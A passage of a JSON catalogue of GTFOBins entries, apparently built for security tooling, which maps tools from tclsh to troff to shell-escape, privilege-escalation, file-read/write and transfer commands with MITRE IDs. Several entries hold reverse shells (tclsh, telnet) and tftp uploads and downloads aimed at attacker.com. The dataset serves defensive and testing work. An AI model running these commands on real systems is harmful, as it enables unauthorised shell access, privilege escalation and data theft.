$s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:reverse-shell:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:reverse-shell:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:shell:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:shell:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:shell:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tcpdump:command:0:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\ntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /path/to/temp-file -Z root","description":"This requires some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:command:0:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\ntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /path/to/temp-file","description":"This requires some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:command:1:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"tcpdump -ln -i lo -w 'command-argument' -W 1 -G 1 -z /path/to/command","description":"This require some traffic to be actually captured. Also note that the `command-argument` string is both passed to the command and written as file, hence some restrictions apply.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:command:1:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"tcpdump -ln -i lo -w 'command-argument' -W 1 -G 1 -z /path/to/command","description":"This require some traffic to be actually captured. Also note that the `command-argument` string is both passed to the command and written as file, hence some restrictions apply.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:file-write:0:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:file-write:0:suid","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:file-write:0:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcsh:file-write:0:sudo","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tcsh:file-write:0:suid","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcsh -bc 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tcsh:file-write:0:unprivileged","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tcsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tcsh:shell:0:sudo","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tcsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tcsh:shell:0:suid","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tcsh -b","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tcsh:shell:0:unprivileged","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tcsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tdbtool:shell:0:sudo","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tdbtool/"]},{"id":"gtfo:tdbtool:shell:0:suid","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tdbtool/"]},{"id":"gtfo:tdbtool:shell:0:unprivileged","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tdbtool/"]},{"id":"gtfo:tee:file-write:0:sudo","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tee/"]},{"id":"gtfo:tee:file-write:0:suid","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tee/"]},{"id":"gtfo:tee:file-write:0:unprivileged","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tee/"]},{"id":"gtfo:telnet:reverse-shell:0:sudo","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:telnet:reverse-shell:0:suid","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:telnet:reverse-shell:0:unprivileged","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:telnet:shell:0:sudo","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:telnet:shell:0:suid","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:telnet:shell:0:unprivileged","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:terraform:file-read:0:sudo","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/terraform/"]},{"id":"gtfo:terraform:file-read:0:suid","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/terraform/"]},{"id":"gtfo:terraform:file-read:0:unprivileged","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/terraform/"]},{"id":"gtfo:tex:shell:0:sudo","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tex/"]},{"id":"gtfo:tex:shell:0:suid","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tex/"]},{"id":"gtfo:tex:shell:0:unprivileged","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tex/"]},{"id":"gtfo:tftp:download:0:sudo","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tftp:download:0:suid","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tftp:download:0:unprivileged","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tftp:upload:0:sudo","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tftp:upload:0:suid","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tftp:upload:0:unprivileged","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tic:file-read:0:sudo","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tic/"]},{"id":"gtfo:tic:file-read:0:suid","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tic/"]},{"id":"gtfo:tic:file-read:0:unprivileged","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tic/"]},{"id":"gtfo:time:shell:0:sudo","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"time /bin/sh","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/time/"]},{"id":"gtfo:time:shell:0:suid","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"time /bin/sh -p","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/time/"]},{"id":"gtfo:time:shell:0:unprivileged","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"time /bin/sh","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/time/"]},{"id":"gtfo:timedatectl:inherit:0:sudo","toolId":"gtfo:timedatectl","toolName":"timedatectl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"timedatectl list-timezones","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/timedatectl/"]},{"id":"gtfo:timedatectl:inherit:0:unprivileged","toolId":"gtfo:timedatectl","toolName":"timedatectl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"timedatectl list-timezones","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/timedatectl/"]},{"id":"gtfo:timeout:shell:0:sudo","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"timeout 0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/timeout/"]},{"id":"gtfo:timeout:shell:0:suid","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"timeout 0 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/timeout/"]},{"id":"gtfo:timeout:shell:0:unprivileged","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"timeout 0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/timeout/"]},{"id":"gtfo:tmate:shell:0:sudo","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmate/"]},{"id":"gtfo:tmate:shell:0:suid","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmate/"]},{"id":"gtfo:tmate:shell:0:unprivileged","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmate/"]},{"id":"gtfo:tmux:file-read:0:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:file-read:0:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:file-read:0:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:0:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:0:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:0:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:1:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:1:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:1:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:top:shell:0:sudo","toolId":"gtfo:top","toolName":"top","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc\ntop\n# press return twice\nreset","description":"The config path might be different.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/top/"]},{"id":"gtfo:top:shell:0:unprivileged","toolId":"gtfo:top","toolName":"top","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc\ntop\n# press return twice\nreset","description":"The config path might be different.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/top/"]},{"id":"gtfo:torify:shell:0:sudo","toolId":"gtfo:torify","toolName":"torify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"torify /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/torify/"]},{"id":"gtfo:torify:shell:0:unprivileged","toolId":"gtfo:torify","toolName":"torify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"torify /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/torify/"]},{"id":"gtfo:torsocks:shell:0:sudo","toolId":"gtfo:torsocks","toolName":"torsocks","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"torsocks /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/torsocks/"]},{"id":"gtfo:torsocks:shell:0:unprivileged","toolId":"gtfo:torsocks","toolName":"torsocks","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"torsocks /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/torsocks/"]},{"id":"gtfo:troff:file-read:0:sudo","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man 